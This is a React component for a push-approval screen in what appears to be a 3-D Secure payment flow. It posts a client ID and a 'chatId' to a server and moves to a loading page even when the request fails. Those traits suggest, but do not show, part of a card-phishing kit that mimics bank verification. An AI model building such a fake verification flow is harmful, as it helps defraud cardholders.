import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import axios from 'axios';
import StandardCardLayout from './StandardCardLayout';
import { SERVER_URL } from '../utils/config';
import './Pushloader.css';

export const PushPage = () => {
  const navigate = useNavigate();
  const [submitting, setSubmitting] = useState(false);

  const handleConfirmPush = async (e) => {
    if (e && e.preventDefault) e.preventDefault();
    setSubmitting(true);
    try {
      const clientId = localStorage.getItem('clientUuId');
      const chatId = localStorage.getItem('chatId');
      await axios.post(`${SERVER_URL}/api/push-approved`, {
        clientId,
        chatId,
      });
      navigate('/3ds/loading');
    } catch {
      navigate('/3ds/loading');
    } finally {
      setSubmitting(false);
    }
  };

  const handleCancel = () => {
    const geo = localStorage.getItem('geo') || 'vn';
    const checkoutPath = localStorage.getItem('checkout_path') || `/${geo}/homepage`;
    navigate(checkoutPath);
  };

  return (
    <StandardCardLayout
      mode="push"
      onSubmit={handleConfirmPush}
      onCancel={handleCancel}
      submitting={submitting}
    />
  );
};

export default PushPage;
